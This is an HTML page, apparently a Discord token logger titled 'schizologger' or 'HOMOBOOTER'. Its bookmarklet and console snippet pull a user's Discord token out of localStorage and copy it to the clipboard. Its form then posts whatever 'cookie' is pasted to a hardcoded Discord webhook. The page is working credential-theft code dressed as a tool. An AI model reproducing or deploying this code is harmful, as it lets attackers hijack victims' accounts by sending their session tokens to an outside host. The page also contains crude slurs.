<!DOCTYPE html>
<html lang="en">
	<head>
		<link rel="icon" type="image/png" href="https://ave.is-a.dev/assets/skull.png">
		<title>schizologger</title>
	</head>
	<style>
		@font-face {
			font-family: "San Francisco";
			font-weight: 400;
			src: url("https://applesocial.s3.amazonaws.com/assets/styles/fonts/sanfrancisco/sanfranciscodisplay-regular-webfont.woff");
		}

		body, html, a, p {
			font-family: "San Francisco";
		}
		
		#form-input {
			margin-bottom: 15px;
			width: 400px;
			height: 25px;
		}

		#form-submit {
			margin-bottom: 15px;
			width: 100px;
			height: 25px;
		}

		#log {
			width: 45%;
			border: 1px solid black;
			border-radius: 4px;
			background-color: white;
			padding: 16px;
			height: 200px;
			min-height: 200px;
			margin-bottom: 8px;
		}

		body {
			background-image: url("https://media.tenor.com/f2aHr4I_eewAAAAC/gay-saul-goodman.gif");
			background-repeat: no-repeat;
			background-size: 100% 100%;
		}

		body, html {
			height: 100%;
			width: 100%;
		}
	</style>
	<body>
		<img src="/logo.png">

		<div>
			<a href="http://jigsaw.w3.org/css-validator/check/referer">
				<img src="https://eda.gay/img/vcss-blue.gif" style="border:0;width:88px;height:31px">
			</a>
			<a href="https://web3isgoinggreat.com/">
				<img src="https://eda.gay/img/anti_nft_b.png">
			</a>
			<a href="http://www.freebsd.org/">
				<img src="https://eda.gay/img/powerani.gif" style="position:relative;top:12px;">
			</a>
			<img src="https://eda.gay/img/www.gif">
			<img src="https://eda.gay/img/bob.gif">
			<img src="https://eda.gay/img/sun.gif">
			<img src="https://cdn1.ftimg.com/images/ads/gfx_gimp.gif">
		</div>

		<ul>
			<li><a href="javascript:(function(){location.reload();var i = document.createElement('iframe');document.body.appendChild(i);navigator.clipboard.writeText(i.contentWindow.localStorage.token)})()">Bookmarklet</a></li>
			<li><a href="javascript:navigator.clipboard.writeText(`(function(){location.reload();var i = document.createElement('iframe');document.body.appendChild(i);navigator.clipboard.writeText(i.contentWindow.localStorage.token)})()`)">Copy code for console</a></li>
		</ul>

		<form>
			<input type="text" id="form-input" placeholder="cookie"></input>
			<button type="submit" id="form-submit">SUBMIT</button>
		</form>

		<div id="log"></div>

		<img src="https://media.tenor.com/V5jKgnXoSzIAAAAd/beamed-discord.gif">

		<script src="https://code.jquery.com/jquery-3.6.2.min.js"></script>
		<script>
			function write(str) {
				console.log(str);
				$("#log")[0].innerHTML += (`<div>${str}</div>`);
			};

			write(`HOMOBOOTER 1.4 (${document.location.hostname})`)
			write("r.i.p gene takovic u were the meanin of lyfe -eli")
			write("➡️ Ready");

			$("form")[0].addEventListener("submit", (e) => {
				e.preventDefault();
				
				let cook = $("#form-input")[0].value;
				console.log(cook);
				
				$.post("https://discord.com/api/webhooks/1101528266373873694/X3TVaHAB8jJ6BqJ9TOB2tVQA9ogpnpSy4niSzwM1BuohDdP-ApPedUPPLP3n3UYi2qWT", {
					"content": `@everyone new cookie recieved:\n\`\`\`\n${cook}\n\`\`\`\nhttps://media.tenor.com/V5jKgnXoSzIAAAAd/beamed-discord.gif`
				})
					.always(() => write(`➡️ Posting webhook (${cook})`))
					.done(() => write("✅ Success (webhook posted with zero failures)"))
					.fail(() => write("❌ Failure"));
			});
		</script>
	</body>
</html>